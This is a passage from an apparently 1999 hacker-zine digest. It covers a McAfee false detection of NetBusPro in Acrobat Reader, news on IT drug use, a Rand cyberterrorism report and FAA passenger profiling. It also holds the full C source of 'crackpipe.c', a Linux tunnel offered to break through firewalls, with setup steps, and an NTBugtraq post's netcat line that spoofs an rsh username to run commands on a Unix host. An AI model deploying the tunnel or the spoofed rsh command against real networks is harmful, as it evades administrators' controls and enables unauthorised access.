http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm

within which, they state, unequivocally (as I hoped they would);

"Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro software."
Note, this means not in pre-release, not in released, not in any Adobe software (that goes for Pagemill too!).

This means, to me, this has truly been a mis-detection by NAI and Adobe should be believed and trusted on this point.

Now before I get a flood of messages from you X-Files fans out there, listen up.

1.Adobe has never threatened me. Their PR schpiel could use some work, and they should learn better how to deal with privacy issues and technical
consumers, but I don't, and haven't, felt compelled to say or do anything.

2.I have believed, all along, that this was a mis-detection. When Jim sent me the email from service@adobe.com, I was very suspicious. When I downloaded a
then current version of the pre-release and couldn't find a file called NETBUSPRO.DR in there anywhere, I scratched my head and wrote some things. All
along, however, I believed it would be borne out to be a mis-detection.

3.You guys, or those that responded to me directly (hundreds of you, thanks!), weren't so convinced. So my Adobe editorial reflected that skeptism and
doubt, mixed with the facts I had at hand.

4.For the die-hard conspiracy theorist amongst you, I have a copy of Jim's user's original download of the pre-release. Its 4.6MB zipped, and I won't send it
more than a couple of times, but if you can convince me its going to prove something for you to look at it, I'll pass it along.

There's a few lessons to be learnt here;

I.Anti-virus software will always mis-detect when they are based on signature "profiling".

II.AV Vendors should all have publicly accessible pages stating any and all mis-detections and should be updated immediately once a mis-detection is
confirmed. I don't think it matters what liability issues might be obstacles to such a page, the damage mis-detections can cause to individuals, corporations,
software distribution venues, as well as publishers, should be allayed by the AV Vendor who mis-detects.

I have had numerous reports from a variety of sources about the horror stories mis-detection has caused (and is still causing).

I don't think we need view mis-detections as a flaw in the AV software, since they're a fact of the way AV software works. Like Email hoaxes, such
spurrious incidents occur, and re-occur, and so should be stated somewhere for all to see.

One individual told me of how a mis-detection of a macro virus in a Word document led two partner companies to nearly dissolve their relationship because
of the insistance of both sides that they had the facts of the matter (virus or not virus).

III.If PR people are going to handle "rumors" such as this one with Adobe, they better know what they're talking about and whom they're talking to. Sarah,
from Adobe, meant to send a message to NTBugtraq but sent it to Bugtraq instead because "she got the names mixed up". Gee, I guess she hadn't read
any of the thread then, had she (or anyone in the PR side of Adobe). Next she send me a private unequivacol response to my explicit request for a
message to NTBugtraq...duh...

IV.It should be the responsibility of the AV Vendor to make all public statements about mis-detections, including coordinating with the "harmed" vendor and
making statements on their behalf. Where's NAI's public statement after all this time??? They must believe announcing they mis-detected something will
harm their share value...meanwhile Adobe is left hanging in the wind having to tell the world what NAI has said...without any public confirmation from NAI
themselves!!

Now Tim told me that our friend Vinnie, Vincent Gullotto, Manager of AV Researchers at AVERT, was "going to have a page put up soon". Well Tim, he told
me that too, last week...and we're still waiting.

Finally, many of you are probably wondering why I've spent any time on this, or what it has to do with NT Security in the first place...good question...;-]

Fact is, the original issue occured with 2 pieces of NT software, so its somewhat related to NT. More importantly, it was a test of the response mechanisms for the
companies involved. Think of it like those tests of the Early Warning System we used to get on TV.

As I told Tim;

a.Had the Adobe service rep., the one who responded to Jim's user's question about the detection, not said that a file called NETBUSPRO.DR was in the
Acrobat Reader package, none of this would ever have seen the light of day.

b.Had Adobe put up a publicly accessible page on 3/19, when they first knew, and had had confirmed by NAI, that McAfee VirusScan was mis-detecting,
none of this would ever have seen the light of day.

c.Had NAI responded to NTBugtraq when I asked them to, and they said they would, the issue would have been dead at that time.

d.Had Adobe's PR not put out the message they did, wherein they couldn't distinguish between a virus and a trojan, or between a malicious piece of code and
a commercial software package, and instead had said what they said later, the issue would have been dead.

They didn't, so the issue wouldn't die amongst you, and I kept getting messages making me say more and dig more.

All in all, Adobe's none too happy with my speculation and fact mix, NAI's probably not going to talk to me in the future (or for a while anyway), and I've annoyed
more than one of you with too many messages about this issue.

...sigh...the life of a moderator...;-]

Cheers,
Russ - NTBugtraq moderator

-------------------------------------------------------------------------------

http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm

McAfee VirusScan 4.x Incorrectly Reports Virus in Ar40.exe or Ar40eng.exe

Document number 323180


Issue
McAfee VirusScan 4.x for Windows reports one or more of the following errors:
- "McAfee VShield: Virus found in download file!"
- "Downloaded File: AR40.ZIP -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download or
transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned. Please
delete the file and restore it from your backup diskettes."
- "AR40.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"
- "Downloaded File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download
or transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned.
Please delete the file and restore it from your backup diskettes."
- "AR40ENG.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"

Details
- You are downloading or have downloaded Adobe Acrobat Reader 4.0 Pre-Release for Windows (Ar40.exe) or Adobe
Acrobat Reader 4.0 for Windows (Ar40eng.exe).
- You're using McAfee virus definitions 4.0.4017 dated March 15, 1999.

Solution
Download and install virus definitions 4.0.4019 or later from the McAfee Web site at http://www.mcafee.com/. The virus
definitions 4.0.4019 are dated March 29, 1999.

Additional Information
Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro
software.

McAfee VirusScan 4.x falsely reports the NetBusPro.dr virus when scanning Ar40.exe and Ar40eng.exe when using
virus definitions 4.0.4017. The virus alert is caused by an error in version 4.0.4017 of the virus definitions file distributed
by Network Associates -- it is not caused by a virus. This has been confirmed by Adobe Systems, Inc. as well as by
the virus lab at Network Associates. When you install virus definitions 4.0.4019, VirusScan 4.x does not report an error
with Ar40.exe or Ar40eng.exe.

All pre-release and release versions of Acrobat 4.0 Reader are free of known viruses. Adobe uses a variety of
anti-virus software in addition to McAfee VirusScan to thoroughly screen all software before it is publicly released.
Ar40.exe was released in February 1999. Before uploading it, Adobe used VirusScan 4.x with virus definitions 4.0.4014
dated February 18, 1999 to verify Ar40.exe was clear of viruses. Before uploading Ar40eng.exe, released in April 1999,
Adobe used VirusScan 4.x with virus definitions 4.0.4019 to verify Ar40eng.exe was clear of viruses.

For further inquiries regarding this issue, please contact Sarah Rosenbaum, Group Product Manager for Adobe Acrobat,
at srosenba@adobe.com.

Related Records:
Product:
Acrobat Reader
Platform:
Windows
Last Updated:
04/08/99
Filename:
19bc6.htm
MacAfee


Legal Notice for information contained in the Technical Solutions Database

THIS DATABASE AND THE DOCUMENTS INCLUDED THEREIN (COLLECTIVELY, THE "DATABASE") ARE PROVIDED FOR THE
CONVENIENCE AND PRIVATE, INTERNAL USE OF ADOBE'S CUSTOMERS ONLY. YOU MAY NOT COPY OR DISTRIBUTE ANY PORTION
OF THIS DATABASE FOR ANY PURPOSE, EXCEPT THAT YOU MAY MAKE ONE PRINTED COPY OF PORTIONS OF THIS DATABASE FOR
YOUR OWN PERSONAL, INTERNAL USE ONLY, PROVIDED THIS ENTIRE DISCLAIMER AND COPYRIGHT NOTICE IS INCLUDED ON
SUCH COPY.

THE USER OF THE INFORMATION PROVIDED IN THIS DATABASE ASSUMES ALL RISK OF ITS ACCURACY AND FOR ITS USE. THIS
DATABASE IS BEING PROVIDED "AS-IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
NON-INFRINGEMENT. ALL OTHER LIMITATIONS ON LIABILITY CONTAINED IN THE APPLICABLE SOFTWARE PRODUCT END USER
LICENSE AGREEMENT SHALL APPLY. ADOBE SYSTEMS INCORPORATED ASSUMES NO RESPONSIBILITY FOR ERRORS OR OMISSIONS
IN THE DATABASE. THIS DATABASE MAY INCLUDE TECHNICAL OR OTHER INACCURACIES OR TYPOGRAPHICAL ERRORS, AND
CHANGES MAY BE PERIODICALLY ADDED TO THE INFORMATION HEREIN.

ADOBE SYSTEMS INCORPORATED DOES NOT GUARANTEE THAT SOLUTIONS SUGGESTED IN THIS DATABASE WILL BE EFFECTIVE
IN THE USER'S PARTICULAR SITUATION. IF THE USER IS NOT FAMILIAR WITH ANY OF THE STEPS LISTED IN THE SOLUTION, ADOBE
ADVISES THAT THE USER DOES NOT PROCEED WITHOUT FIRST CONSULTING ADDITIONAL RESOURCES.

-------------------------------------------------------------------------------

Date: Wed, 14 Apr 1999 14:33:59 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Adobe: Conclusion Part 2 - final

FYI: NAI now has a public web statement posted at:
http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp

This closes the issue.

Cheers,
Russ - NTBugtraq moderator


[http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp]

Network Associates certifies that Adobe software, such as Acrobat
Reader, does not contain, and never did contain, the NetBusPro Trojan.

Posted April 13, 1999

McAfee VirusScan 4.x falsely reported the NetBusPro.dr
trojan when scanning Ar40.exe and Ar40eng.exe pre-release
software when using virus definitions 4.0.4017. The virus alert
was caused because there was identifying code within Adobe’s
product that had a similar pattern as trojan known as NetBusPro.dr.
This has been confirmed by the virus lab at Network Associates,
Inc. and by Adobe Systems Incorporated. If you are experiencing
this problem <a href="http://www.avertlabs.com/public/datafiles/4xupdates.asp">
please upgrade your DAT to virus definitions to at least v4.0.4019</a>,
and all issues will be rectified.
Sincerely,

AVERT, A Division Of NAI Labs


@HWA

10.0 Crackpipe.c bypasses any firewalls via tunneling (linux)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* crackpipe.c -- uses the ethertap stuff to try to tunnel an IP,
without using ipip, to break through firewalls. May the world's
fascist admins rot in hell for their port-blocking policies. */

/* usage information is in comments at the very end of this file */

#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>


/* define TCP or UDP here so we can decide how we'd like to
connect. */
#define UDP
#undef TCP

/* maximum size to use for the copy buffer */
/* setting the MTU of the tap device to something bigger than this
would probably be a bad idea, methinks */

#define BUFSIZE 4096

/* also, the mtu for the tap device must be smaller than the
mtu of your connection to the net... if it's not, packets will be
chopped up in transit.. looking at this, I'd say you've gotta have
16 bytes difference, at least, but what's the point in pushing your
luck. go for a couple hundered or so, so if your ethernet uses an
MTU of 1500, do something like 1200 for safety when you ifconfig
tap0 */

void selectloop(int netfd, int tapfd);
void usage(void);

char buffer[BUFSIZE];


main(int ac, char *av[]) {

int destport;
struct sockaddr_in destaddr;
struct hostent *ht;
int sock;
int daemon;
int netfd;
int tapfd;

/* check for a sane number of parameters */
if(ac != 3)
usage();

/* get port number, bail if atoi gives us 0 */
if((destport = atoi(av[2])) == 0)
usage();

/* check if we're a daemon or if we will connect. */
if(av[1][0] == '-')
daemon = 1;
else
daemon = 0;

if(!daemon) {
/* resolve DNS */
if((ht = gethostbyname(av[1])) == NULL) {
switch(h_errno) {
case HOST_NOT_FOUND:
printf("%s: Unknown host\n", av[2]);
break;
case NO_ADDRESS:
printf("%s: No IP address for hostname\n", av[2]);
break;
case NO_RECOVERY:
printf("%s: DNS Error\n", av[2]);
break;
case TRY_AGAIN:
printf("%s: Try again (DNS Fuckup)\n", av[2]);
break;
default:
printf("%s: Unknown DNS error\n", av[2]);
}
exit(0);
}

/* set up the destaddr struct */

destaddr.sin_port = htons(destport);
destaddr.sin_family = AF_INET;
memcpy(&destaddr.sin_addr, ht->h_addr, ht->h_length);

}

#ifdef TCP
sock = socket(AF_INET, SOCK_STREAM, 0);
#endif

#ifdef UDP
sock = socket(AF_INET, SOCK_DGRAM, 0);
#endif

if(sock == -1) {
perror("socket");
exit(0);
}

printf("Opening network socket.\n");

if(!daemon) {
if(connect(sock, &destaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("connect");
exit(0);
}
netfd = sock;
}
else {
struct sockaddr_in listenaddr;
#ifdef UDP
struct sockaddr_in remote;
#endif
int socklen;

listenaddr.sin_port = htons(destport);
listenaddr.sin_family = AF_INET;
listenaddr.sin_addr.s_addr = inet_addr("0.0.0.0");

if(bind(sock, &listenaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("bind");
exit(0);
}

socklen = sizeof(struct sockaddr_in);

#ifdef TCP

if(listen(sock, 1) == -1) {
perror("listen");
exit(0);
}

printf("Waiting for TCP connection...\n");


if((netfd = accept(sock, &listenaddr, &socklen)) == -1) {
perror("accept");
exit(0);
}



#else /* TCP */
netfd = sock;

recvfrom(netfd, buffer, BUFSIZE, MSG_PEEK, &remote,
&socklen);

connect(netfd, &remote, socklen);

#endif
}
/* right. now, we've got netfd set to something which we're
going to be able to use to chat with the network. */

printf("Opening /dev/tap0\n");

tapfd = open("/dev/tap0", O_RDWR);
if(tapfd == -1) {
perror("tapfd");
exit(0);
}

selectloop(netfd, tapfd);

return 0;
}

void selectloop(int netfd, int tapfd) {

fd_set rfds;
int maxfd;
int len;

if(netfd > tapfd)
maxfd = netfd;
else
maxfd = tapfd;


while(1) {

FD_ZERO(&rfds);
FD_SET(netfd, &rfds);
FD_SET(tapfd, &rfds);

if(select(maxfd+1, &rfds, NULL, NULL, NULL) == -1) {
perror("select");
exit(0);
}

if(FD_ISSET(netfd, &rfds)) {
FD_CLR(netfd, &rfds);

if((len = read(netfd, buffer, BUFSIZE)) < 1) {
if(len == -1)
perror("read_netfd");
printf("netfd died, quitting\n");
close(tapfd);
exit(0);
}

printf("%d bytes from network\n", len);
write(tapfd, buffer, len);
continue;
}

if(FD_ISSET(tapfd, &rfds)) {
FD_CLR(tapfd, &rfds);

if((len = read(tapfd, buffer, BUFSIZE)) < 1) {
if(len == -1)
perror("read_tapfd");
printf("tapfd died, quitting\n");
shutdown(netfd, 2);
close(netfd);
exit(0);
}

printf("%d bytes from interface\n", len);
write(netfd, buffer, len);
continue;
}

} /* end of looping */

}


void usage(void) {

printf("You fucked up the arguments.\n");
exit(0);

}

/* songs of firewalls, by the crackpipe author, just for some
interesting source reading. */

/* firewall song #1, to the tune of "the beverly hillbillies" */

/* ohhhh, lemme tell you a story about a man who's lame
this nasty admin oughta hang his head in shame,
thought one day "this network's kinda loose"
into his mind poured a bubblin' ooze... */

/* "firewalls," he thought...
no mail, no dns... */

/* well, the users decided, this shit has gotta go
we just need the proper sexy hunk of code,
well, crackpipe came and broke a hole on through,
and gave the bastards a needed "fuck you"... */

/* hmmmm. need to finish that eventualy */



/* alright, this should tell you how to use this fucker... well,
hopefully... */

/* alright, the args go something like this:

crackpipe <host | -> <port>

the first argument is either the hostname to connect to, or, if
you're the host which will be listening, a -.. obviously, the
system inside the firewall gives the hostname, and the free system
gives the -.

both sides must specify a port #... this should, clearly, be the
same for both ends...

that should explain it..
*/

/* oh, also, here's what you'll need to turn on in the linux kernel --

first, you'll need a kernel in the later 2.1 range... I'd say from
2.1.80 up should be cool, but I'm not positive about that.. if all
of the config options I mention below aren't present, it's too old.

in the "Networking Options" section, turn on:
"Kernel/User netlink socket"
and, just below,
"Netlink device emulation"

also, in the "Network device support" section, turn on:
"Ethertap network tap"

if those are compiled in, your kernel is set. */

/* configuring the ethertap device --

first, the necessary /dev files need to exist, so run:
mknod /dev/tap0 c 36 16

to get that to exist.

next, you have to ifconfig the ethertap device, so pick a subnet
you're going to use for that. in this example, we're going to use
the network 192.168.1.0, with one side as 192.168.1.1, and the
other as 192.168.1.2... so, you'll need to do:

ifconfig tap0 192.168.1.1(or .2) mtu 1200

(see the notes at the beginning for a good size for the mtu value.
basically, it's got to be lower than the mtu value listed for eth0
when you run ifconfig)

2.1 kernels should create the needed route automatically, so that
shouldn't be a problem.

*/

/* hopefully, no matter how 14m3 you are, that will give you some idea
of what you need to do, config-wise. if not, well, then ask some
'1337 linux-guru type d00d, and hopefully he can get the routing
and shit right. */

11.0 Unix rshd and rsh/rpc vulnerabilties in WindowsNT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 8 Apr 1999 19:11:54 -0700
From: Eric Gisin <ericg@TECHIE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: rsh/rcp is not secure

This is really a UNIX rshd bug, but it affects users of the NT clients.

It's old news that the BSD rsh/rcp services are not secure, however rshd is
still is enabled in many UNIX systems. There are rsh/rcp clients in Windows
NT, and people are not aware of the ease of defeating security in this
environment.

The security of this service is based on privileged ports, which are not
widely implemented. The NT versions of rcp/rsh have no special privileges
like the UNIX versions. Anyone can modify the source or use netcat to fake
the client username. For example,
D:> nc -v unixhost 514 -p 666
^@newbie^@newbie^@chmod a= .^@
This will execute the chmod command under newbie's account, if he permits
access from that client machine in .rhosts.

Basically the problem is since Windows NT includes rsh/rcp, people assume
it's as secure as the UNIX counterpart, which is not the case.

--------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 09:28:04 -0700
From: David LeBlanc <dleblanc@MINDSPRING.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: rsh/rcp is not secure

At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:

>Basically the problem is since Windows NT includes rsh/rcp, people assume
>it's as secure as the UNIX counterpart, which is not the case.

The UNIX counterpart isn't really all that secure in any case - it assumes
that no one on the network can be root, and so come from a low port.

Something else to think about is that running a rshd on NT isn't usually a
good idea - several implementations run everything as LocalSystem, and the
ones that don't store live user passwords.

These utilities are full of other security holes - look at the checks in
the various scanning products for some examples. Safest thing is just not
to run rsh, rlogin and rexec.


David LeBlanc
dleblanc@mindspring.com


@HWA


12.0 IT professionals are on Drugs?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From The Independent (UK)

http://www.independent.co.uk/net/990419ne/story1.html


The high techies


They are young, well-paid and, increasingly, turning to recreational
drugs to cope with the pressures of their jobs as IT programmers,
engineers and developers. By Samantha Downes

The violent death of Chris Dawes, multi-millionaire founder
of software company Micromuse, grabbed the headlines
last month. Dawes was killed when his £640,000 F1
McLaren crashed in rural Essex.

At the time, he was facing charges for possession of and
intent to supply crack cocaine.

While Dawes' death may be an extreme example of the
perils of being a hi-tech high flyer, there is a proliferation of
recreational drug use in the IT industry.

Young IT professionals have eschewed the 1980s black
suit for combat fatigues and trainers. The dance and drugs
culture has been enthusiastically embraced by these affluent
twentysomethings who do not have time for long lunches or
hanging out in wine bars.

The IT programmers and engineers The Independent met
in London clubs saw their drug taking as an outlet which
eases long hours and mops up some of their considerable
salaries. Robert, a 23-year-old London-based web
designer, believes he is a typical example of the
recreational drug user.

He started taking speed while at university and has
graduated to ecstasy and cocaine since starting his job two
years ago. "That coke-snorting thing behind the wheel of a
Ferrari is such a bloody cliché," he said. "It's not about
being glamourous now, it's about relaxing and being
sociable."

Jules, also 23, is a "boring nerd, but I do love my job". He
works as a systems engineer at an investment bank and,
like Robert, takes ecstasy, but only at weekends. "We all
work incredibly hard. Most of the time there are not
enough hours for an after-work beer," he said.

"And although the work can be monotonous it is very well
paid. So getting blasted is simply a fast route to relaxation."

Extra pressures such as the millennium bug have pushed IT
professionals into fitting the archetypal recreational drug
abuser profile, according to Dr David Best, research
co-ordinator at the National Addiction Centre and an
honourary lecturer at the Institute of Psychiatry.

Dr Best believes that recreational drug abusers are
attracted by the image of drug taking as much as the effect
of the drugs themselves.

"Stimulant drugs like cocaine are appealing to young
wealthy executives because they are associated with
gregarious, sociable behaviour," he said. "They are more
likely to be used by young up and coming professionals
recreationally. These people have a high disposable income
and their jobs are pressurised and demanding."

The IT industry's relative youth and its location in cities or
large towns also make it prey to opportunistic pushers.
Most weekend users admit that they do not have to go out
hunting for drugs. "My boss supplies me with the drugs,"
one female programmer said.

There are geographical variations in drug availability. It is
more likely in cities, but it will also depend on the network
of the individuals involved and their external contacts, Dr
Best said: "Those who sell drugs are opportunistic and if
they see a market they will sell to it."

Dr Best said small firms in newer industries are less likely
to have the screening processes in place to discourage drug
taking. American financial firms in the City have for several
years implemented strict and expensive screening, but there
appear to be few measures to prevent or dissuade some
young IT employees from taking drugs.

Louise, a 20-year-old software developer from
Hertfordshire, travels down to London each weekend to
join her young, heavily salaried bosses for a binge. "I work
in a young industry where things are changing all the time. I
am highly stressed a lot of the time. Most days I'm working
12 to 14 hours. I can't afford to live in London because I
work out in the sticks. But because of my hours during the
week I can spend what I earn going out every weekend.
It's easy to get drugs, whether E, speed or coke."

Personality-based theories of drug use might find
sustenance in the stereotypical image of the nerdy
computer boffin.

"We found that drug users tend to be those with low
autonomic arousal, people who have low levels of system
activity," Dr Best said. "They need external stimuli and are
those most likely to pursue drugs."

"My job is not creative, but that doesn't mean that I'm not
creative," explained Louise. "When I'm on E it feels like my
mind has opened up - I don't care about anything."

According to the Standing Conference on Drug Abuse,
there have been more than 70 notified deaths of ecstasy
users in the UK since 1992, but most of the users we
spoke to felt the risks were infinitesimal. Those who took
cocaine or speed were even less concerned, because these
drugs are seen as more established and their effects as
better documented.

But employers who turn a blind eye should note the
side-effects identified by Dr Valerie Curran, reader in
psychopharmacology at University College London. Her
research has shown that a significant number of users are
liable to bouts of depression. This manifests itself in what
the Institute for Drug Dependence calls "presenteeism" -
where people were at work but unable to perform their job
to the best of their ability.

"We found regular users who were clinically depressed at
some stage during the week," Dr Curran said. "Ecstasy
makes your brain spill out huge levels of serotonin, the
feel-good hormone, and the brain has to work really hard
to get it back."

Dr Curran found that the average use of ecstasy and
cocaine was every other week. But regular users need
more to keep them at the same level of high.

"If you give four doses of ecstasy to a monkey it still has
brain damage two years later," she said.

But Anne Marshall, director of Adfam, believes that
weekend drug users are well aware of the risks of their
illicit habit. "When it comes to the health issues, people
poo-poo all the information pushed at them. Those who
use drugs at the weekend have the attitude: 'I work hard, I
like to relax but don't have the time, so I need to take
something to switch off immediately.'

"The problem might not be at a level that is important, but
the effects can be long term: relationships with partners or
friends may break down, which can be just as damaging."

But Marshall believes that in most cases users stop
because they simply get too old. "As with alcohol, where
the effects of a hangover get worse even as you enter your
mid-20s, so too do the effects of drug abuse. That's when
people start to re-think their habit. It gets harder to sustain
and they have to look for something more rewarding."

Peter Skyte, national officer for the 12,000-strong IT
Professionals Association, part of the Manufacturing
Science and Finance Union, said employers had a duty to
prevent drug abuse: bosses should look for "the problem
not the symptom".

"Drug problems may be work related," Mr Sykes said.
"Many employers may worsen problems by imposing
certain conditions. They have an obligation to identify risks
in the workplace, such as the stress which can be caused
by long hours.

"We would urge all employers, no matter how small, to
make a commitment at senior levels to provide counselling
and support for all employees," he added.

@HWA

13.0 Rand corporation releases a paper on Cyber Terrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From wired:http://www.wired.com/news/news/politics/story/19208.html

How to Fight a Cyberwar
Wired News Report

3:00 a.m. 20.Apr.99.PDT
Future terrorists will take to the Internet to pursue campaigns of disruption instead
of destruction, a new report predicts.

Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin
Laden's remote Afghan retreat is well wired: "The terrorist financier has
computers, communications equipment, and a large number of disks for data
storage."

Hamas has also taken to the Internet to exchange operational information. For
example, operatives communicate via chat rooms and email.

The report distinguishes between "cyberwar" -- a military operation -- and
"Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated
by individuals rather than countries. "Whereas cyberwar usually pits formal
military forces against each other, Netwar is more likely to involve nonstate,
paramilitary, and irregular forces."

The report, prepared for the US Air Force, recommends that the Pentagon stop
modernizing all computer systems and communications links. "Full
interconnectivity may in fact allow cyberterrorists to enter where they could
not [before]," it says.

The report warns that terrorism "will focus on urban areas with strong political
and operational constraints." Translation: It's difficult for the Air Force to bomb the
bejesus out of a terrorist nest if it's in downtown New York.

Another recommendation is that the Air Force develop better spying technologies.
Instead of trying to break encryption, the military should develop "capabilities for
reading emanations" from computer monitors, perhaps through "very small,
unmanned aerial vehicles."

Other studies have reached similar conclusions about online terrorists.

"The Internet -- and the window to it, the computer terminal -- have become
two of the most important pieces of equipment in the extremists' arsenals, not
only allowing them to build membership and improve organization, but to strike
alliances with people and groups, even a decade ago, that they might never have
known about or been able to easily communicate with," says a report
prepared in April 1998 for the Chemical Manufacturers Association. The report's
authors are former officials from the US Secret Service and the CIA's
counterterrorism center.

@HWA

14.0 FAA to implement CAPS
~~~~~~~~~~~~~~~~~~~~~
Via HNN and Wired http://www.wired.com/news/news/politics/story/19218.html

FAA to Implement CAPS

contributed by Space Rogue
A $2.8 Billion system is to be used by the FAA to monitor airline passengers.
Traveler information will be run through the FAAs secret algorithm and matched
against a terrorist profile. If passengers fit the profile, or are chosen at
random, increased security will be given to their luggage. While some airlines
(NorthWest) have already voluntarily implemented computer-assisted passenger
screening programs (CAPS), the FAA may make it mandatory for all airlines.
(Hmmm, maybe I won't go to DefCon after all.)


You? A Terr

  
orist? Yes!
by Declan McCullagh

3:00 a.m. 20.Apr.99.PDT
WASHINGTON -- A US$2.8-billion monitoring system championed by Vice President Gore
will use computer profiles to single out airline passengers for investigation and
scrutiny.

Airlines will use a secret algorithm to compare travelers' personal data to profiles
of likely terrorists, according to a new proposed federal regulation.Other travelers
will be chosen at random.

Critics complain the plan shows that Gore doesn't really support privacy. Last May,
the vice president told an audience of graduating students at New York University that
privacy "is a basic American value."

"He's been talking about privacy and the protection of personal information online, but
those principles that he talks about don't parallel what he's done. He's tried to force
intrusive measures into law," says Lisa Dean, vice president of the Free Congress
Foundation. "We'd have even more of this with a President Gore."

The vice president chaired a high-level White House commission that in 1997 released
recommendations that the Federal Aviation Administration compiled into a 40-page rule
published Monday.

Unless FAA officials change their minds, all 32 US-based airlines will be required to
concoct computer-assisted passenger screening programs, called CAPS. Many of the larger
airlines, including Northwest Airlines, have already complied.

"It's software that runs on the airline's reservation system. What it does is select
passengers whose checked bags will require additional security and it also selects
passengers at random," says FAA spokesperson Rebecca Trexler.

According to the proposed rule, "Random selection helps to ensure passengers' civil
liberties by guaranteeing that no individual or group of individuals is excluded from
the selection process."

Airlines will already know that you are flagged as a suspicious passenger when you
arrive at the ticket counter, according to Susan Rork, managing director of security at
the Air Transport Association.

"The customer service agent would get a signal whether you would be selected for
additional security measures," said Rork, and your checked luggage would be put aside
to be examined for bombs.

Might you be interrogated by police as well? "We are not at this point taking this beyond
the checked baggage," she said. Exactly how CAPS databases profile Americans and what
information is used remains secret. The FAA, the Department of Justice, and the airline
industry -- which jointly developed terrorism profiles behind closed doors -- all claim
that details must remain confidential for the system to work. The regulation says simply,
"The automated system 'scores' passengers according to a set of weighted criteria to
determine which should be subjected to additional security measures."

But testimony at a June 1998 House Transportation subcommittee hearing suggested that
terrorist profiles are built using a passenger's last name, whether the ticket was
purchased with cash, how long before departure it was bought, the type of traveling
companions, whether a rental car is waiting, the destination of the flight and passenger,
and whether the ticket is one-way or round-trip.

"Much of the information in that profile is proprietary. Essentially the profile is an
automated system, not a manual system. It's created from the passenger reservation records
and information that is gleaned in passenger reservation records," said ATA's Rork.

In an October 1997 report, the Department of Justice said that CAPS will analyze passenger
information by assigning positive and negative values to personal information. "To determine
whether a passenger should be selected, the airline reservation computer identifies the
factors that the passenger has hit upon and totals the positive and negative scores; those
passengers who score below the FAA-prescribed cutoff are selectees," The Department of Justice
said.

A letter from Attorney General Janet Reno accompanying the 12-page report said that CAPS "will
not discriminate on the basis of race, color, national or ethnic origin, religion, or gender."

Civil libertarians aren't so easily reassured. "This is not rocket science. Everyone who
knows profiling knows that innocent characteristics can have a disparate impact based on race,"
said ACLU legislative counsel Greg Nojeim.

"For example, a profile that uses past travel to a terrorist-list country to identify people who
will be selected for heightened scrutiny is guaranteed to discriminate against people who trace
their ancestry to those countries and visit their grandparents there."

The ACLU has collected a list of complaints about passenger profiling.

One respondent, who said he was a Northwest Airlines traveler, griped, "The representative
indicated that I was selected by the computer for special treatment. At that point, the security
person donned surgical gloves and proceeded to go through each and every item in my briefcase in
front of all people.... I was very displeased with the whole experience, and felt that it
constituted an unwarranted intrusion on my privacy."

Nojeim, a member of the Gore commission's civil liberties advisory panel, said that the commission
rejected his group's concerns. Among the recommendations not followed by the FAA are an end date to
the profiling system, an independent watchdog panel, and a commitment to not record names and
information about suspicious travelers. The FAA says that it currently plans to record that data
for 72 hours, but is considering keeping them on file for 18 months. The proposed regulation also
allows the FAA or law enforcement unlimited access to the records "in the course of investigating
accidents or security incidents."

The regulations stem from increasing government nervousness about terrorism. Officials warn that a
1995 conspiracy involved Ramzi Ahmed Yousef and other conspirators who planned to bomb 12 US airliners
over the Pacific Ocean. The 1996 crash of TWA flight 800 -- which the FBI and National Transportation
Safety Board said was not a terrorist act -- caused Clinton to create the Gore commission.

Not long after, the FAA gave a $3.1-million grant to Northwest Airlines to create CAPS and $7.8
million to assist other airlines in deploying it, according to agency figures. Northwest did not
immediately return phone calls.

While most of the large carriers have CAPS systems in place, smaller airlines could be in trouble.
The proposed rule states that the "FAA believes that if the potential cost of compliance materializes
as expected, several small operators could go out of business due at least in part to the proposed rule."

For each of the 12 smaller airlines, the FAA's estimated cost of compliance -- largely hiring staff
to do searches -- would be 0.2 to 7.2 percent of total revenues. The FAA estimates the total cost at
$2.3 billion over 10 years.

Critics have said the costs of such a plan outweigh the benefits and terrorists are unlikely to be
deterred in any case. "Profiling is a surrender. It's an effort to make people feel safer about flying
even though what's being done is highly invasive of passenger privacy, likely to result in
discriminatory searches, and unlikely to effectively stop bombings of airplanes," says the ACLU's Nojeim.

Comments on the proposed rule, which can be emailed to 9-NPRM-CMTS@faa.gov, must be received by 18 June.

@HWA

15.0 The Ebayla Hack
